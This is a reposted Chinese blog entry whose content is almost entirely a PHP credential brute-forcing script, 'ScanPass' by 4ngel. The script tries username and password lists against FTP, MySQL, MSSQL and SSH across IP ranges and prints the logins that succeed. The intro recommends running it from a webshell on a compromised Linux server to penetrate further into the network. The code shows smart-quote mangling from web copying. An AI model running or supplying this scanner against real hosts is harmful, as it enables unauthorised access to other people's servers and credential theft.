可以扫FTPMYSQLMSSQLSSH密码

比如webshell在linux下。不会在LINUX下渗透。可以试试这个。

 

1. <?php 
2. @set_magic_quotes_runtime(0); 
3. @set_time_limit(0); 
4.  
5. // 允许程序在 register_globals = off 的环境下工作 
6. $onoff = function_exists(‘ini_get’) ? ini_get(‘register_globals’) : get_cfg_var(‘register_globals’); 
7. if ($onoff != 1) { 
8. @extract($_POST, EXTR_SKIP); 
9. @extract($_GET, EXTR_SKIP); 
10. } 
11. function pr($a) { 
12. echo ‘<pre>’; 
13. print_r($a); 
14. echo ‘</pre>’; 
15. } 
16.  
17. session_start(); 
18.  
19. $type = in_array($_POST['type'], array(‘ftp’,'mysql’,'mssql’,'ssh’)) ? $_POST['type'] : ”; 
20.  
21. $_SESSION['type'] = $type; 
22. $_SESSION['ftpport'] = $ftpport = $_POST['ftpport']; 
23. $_SESSION['mysqlport'] = $mysqlport = $_POST['mysqlport']; 
24. $_SESSION['mssqlport'] = $mssqlport = $_POST['mssqlport']; 
25. $_SESSION['sshport'] = $mssqlport = $_POST['sshport']; 
26. $_SESSION['hostlist'] = $hostlist = $_POST['hostlist']; 
27. $_SESSION['userlist'] = $userlist = $_POST['userlist']; 
28. $_SESSION['passlist'] = $passlist = $_POST['passlist']; 
29.  
30. ?> 
31. <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“> 
32. <html xmlns=”http://www.w3.org/1999/xhtml“> 
33. <head> 
34. <meta http-equiv=”Content-Type” content=”text/html; charset=gbk” /> 
35. <title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title> 
36. <style type=”text/css”> 
37. body, div, td {font-size: 12px;font-family: Arial, sans-serif;color: #333;line-height: 16px;} 
38. a{color:#833;text-decoration:none;} 
39. a:hover{color:#147;text-decoration:underline;} 
40. </style><!–{if $returnurl}–> 
41. </head> 
42.  
43. <body> 
44. <?php 
45. if ($type && $hostlist && $userlist && isset($passlist)) { 
46. $hostdb = explode(“n”, $hostlist); 
47. $userdb = explode(“n”, $userlist); 
48. $passdb = explode(“n”, $passlist); 
49. echo ‘<p>’.$type.’ result</p><hr>’; 
50. if ($type == ‘mysql’) { 
51. !$mysqlport && $mysqlport = 3306; 
52. foreach($hostdb as $host){ 
53. $i=0; 
54. if (strpos($host, ‘-’)) { 
55. $host1 = explode(‘-’, $host); 
56. $hoststart = explode(‘.’, $host1[0]); 
57. $hostend = explode(‘.’, $host1[1]); 
58.  
59. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
60. foreach($userdb as $user) { 
61. if ($user) { 
62. foreach($passdb as $pass) { 
63. !$pass && $pass=”; 
64. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i; 
65. if($link = @mysql_connect($h.’:’.$mysqlport, $user, $pass)) { 
66. echo $h.’:’.$mysqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
67. @mysql_close($link); 
68. break; 
69. } 
70. } 
71. } 
72. } 
73. } 
74. continue; 
75. } else { 
76. foreach($userdb as $user) { 
77. if ($user) { 
78. foreach($passdb as $pass) { 
79. !$pass && $pass=”; 
80. if($link = mysql_connect($host.’:’.$mysqlport, $user, $pass)) { 
81. echo $host.’:’.$mysqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
82. @mysql_close($link); 
83. break; 
84. } 
85. } 
86. } 
87. } 
88. } 
89. } 
90. } elseif ($type == ‘ftp’) { 
91. !$ftpport && $ftpport = 21; 
92.  
93. foreach($hostdb as $host){ 
94. $i=0; 
95. if (strpos($host, ‘-’)) { 
96. $host1 = explode(‘-’, $host); 
97. $hoststart = explode(‘.’, $host1[0]); 
98. $hostend = explode(‘.’, $host1[1]); 
99.  
100. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
101. foreach($userdb as $user) { 
102. if ($user) { 
103. foreach($passdb as $pass) { 
104. !$pass && $pass=”; 
105. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i; 
106. if ($conn_id = @ftp_connect($h, $ftpport)) { 
107. if (@ftp_login($conn_id, $user, $pass)) { 
108. echo $h.’:’.$ftpport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
109. @ftp_close($conn_id); 
110. break; 
111. } 
112. } 
113. } 
114. } 
115. } 
116. } 
117. continue; 
118. } else { 
119. foreach($userdb as $user) { 
120. if ($user) { 
121. foreach($passdb as $pass) { 
122. !$pass && $pass=”; 
123. if ($conn_id = @ftp_connect($host, $ftpport)) { 
124. if (@ftp_login($conn_id, $user, $pass)) { 
125. echo $host.’:’.$ftpport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
126. @ftp_close($conn_id); 
127. break; 
128. } 
129. } 
130. } 
131. } 
132. } 
133. } 
134. } 
135. } elseif ($type == ‘mssql’) { 
136. @ini_set(‘mssql.charset’, ‘UTF-8′); 
137. @ini_set(‘mssql.textlimit’, 2147483647); 
138. @ini_set(‘mssql.textsize’, 2147483647); 
139. if (extension_loaded(‘mssql’)) { 
140. foreach($hostdb as $host){ 
141. $i=0; 
142. if (strpos($host, ‘-’)) { 
143. $host1 = explode(‘-’, $host); 
144. $hoststart = explode(‘.’, $host1[0]); 
145. $hostend = explode(‘.’, $host1[1]); 
146.  
147. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
148. foreach($userdb as $user) { 
149. if ($user) { 
150. foreach($passdb as $pass) { 
151. !$pass && $pass=”; 
152. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i; 
153. if($link = @mssql_connect($h, $user, $pass, false)) { 
154. echo $h.’:’.$mssqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
155. @mssql_close($link); 
156. break; 
157. } 
158. } 
159. } 
160. } 
161. } 
162. continue; 
163. } else { 
164. foreach($userdb as $user) { 
165. if ($user) { 
166. foreach($passdb as $pass) { 
167. !$pass && $pass=”; 
168. if($link = @mssql_connect($host, $user, $pass, false)) { 
169. echo $host.’:’.$mssqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
170. @mssql_close($link); 
171. break; 
172. } 
173. } 
174. } 
175. } 
176. } 
177. } 
178. } else { 
179. echo ‘mssql extension is disable.’; 
180. } 
181. } else { 
182. if (function_exists(‘ssh2_connect’) && function_exists(‘ssh2_auth_password’)) { 
183. !$sshport && $sshport = 22; 
184.  
185. foreach($hostdb as $host){ 
186. $i=0; 
187. if (strpos($host, ‘-’)) { 
188. $host1 = explode(‘-’, $host); 
189. $hoststart = explode(‘.’, $host1[0]); 
190. $hostend = explode(‘.’, $host1[1]); 
191.  
192. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
193. foreach($userdb as $user) { 
194. if ($user) { 
195. foreach($passdb as $pass) { 
196. !$pass && $pass=”; 
197. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i; 
198. if ($conn_id = @ssh2_connect($h, $sshport)) { 
199. if (@ssh2_auth_password($conn_id, $user, $pass)) { 
200. echo $h.’:’.$sshport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
201. break; 
202. } 
203. } 
204. } 
205. } 
206. } 
207. } 
208. continue; 
209. } else { 
210. foreach($userdb as $user) { 
211. if ($user) { 
212. foreach($passdb as $pass) { 
213. !$pass && $pass=”; 
214. if ($conn_id = @ssh2_connect($host, $sshport)) { 
215. if (@ssh2_auth_password($conn_id, $user, $pass)) { 
216. echo $host.’:’.$sshport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
217. break; 
218. } 
219. } 
220. } 
221. } 
222. } 
223. } 
224. } 
225. } else { 
226. echo “function ssh2_connect doesn’t exist”; 
227. } 
228. } 
229. echo ‘<p>Over…</p><hr>’; 
230. } 
231. ?> 
232. <form id=”form1″ name=”form1″ method=”post” action=”"> 
233. <table border=”0″ cellpadding=”0″ cellspacing=”5″> 
234. <tr> 
235. <td valign=”top”>项目</td> 
236. <td><input type=”radio” name=”type” id=”ftp” value=”ftp” <?php if ($_SESSION['type'] == ‘ftp’) {echo ‘checked’;}?> /> 
237. FTP 端口<input type=”text” size=”5″ name=”ftpport” id=”ftpport” value=”<?php if ($_SESSION['ftpport']) {echo $_SESSION['ftpport'];} else {echo ’21′;}?>” /><br /> 
238. <input type=”radio” name=”type” id=”mysql” value=”mysql” <?php if ($_SESSION['type'] == ‘mysql’ || !$type) {echo ‘checked’;}?> /> 
239. MYSQL 端口<input type=”text” size=”5″ name=”mysqlport” id=”mysqlport” value=”<?php if ($_SESSION['mysqlport']) {echo $_SESSION['mysqlport'];} else {echo ’3306′;}?>” /><br /> 
240. <input type=”radio” name=”type” id=”mssql” value=”mssql” <?php if ($_SESSION['type'] == ‘mssql’) {echo ‘checked’;}?> /> 
241. MSSQL 端口<input type=”text” size=”5″ name=”mssqlport” id=”mssqlport” value=”<?php if ($_SESSION['mssqlport']) {echo $_SESSION['mssqlport'];} else {echo ’1433′;}?>” /><br /> 
242. <input type=”radio” name=”type” id=”ssh” value=”ssh” <?php if ($_SESSION['type'] == ‘ssh’) {echo ‘checked’;}?> /> 
243. SSH 端口<input type=”text” size=”5″ name=”sshport” id=”sshport” value=”<?php if ($_SESSION['sshport']) {echo $_SESSION['sshport'];} else {echo ’22′;}?>” /></td> 
244. </tr> 
245. <tr> 
246. <td valign=”top”>主机列表</td> 
247. <td><textarea name=”hostlist” id=”hostlist” cols=”45″ rows=”5″><?php echo $_SESSION['hostlist'];?></textarea> 
248. <br /> 
249. 192.168.1.1-192.168.1.254<br /> 
250. 或一行一个或一行一个段</td> 
251. </tr> 
252. <tr> 
253. <td valign=”top”>用户名列表</td> 
254. <td><textarea name=”userlist” id=”userlist” cols=”45″ rows=”5″><?php echo $_SESSION['userlist'];?></textarea> 
255. <br /> 
256. 一行一个</td> 
257. </tr> 
258. <tr> 
259. <td valign=”top”>密码列表</td> 
260. <td><textarea name=”passlist” id=”passlist” cols=”45″ rows=”5″><?php echo $_SESSION['passlist'];?></textarea> 
261. <br /> 
262. 一行一个</td> 
263. </tr> 
264. <tr> 
265. <td>&nbsp;</td> 
266. <td><input type=”submit” value=”提交” /></td> 
267. </tr> 
268. </table> 
269. </form> 
270. <hr /> 
271. Codz by <a href=”http://www.sablog.net/blog”>4ngel</a><br /> 
272. 2010-11-30 
273. </body> 
274. </html> 

 

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/441308，如需转载请自行联系原作者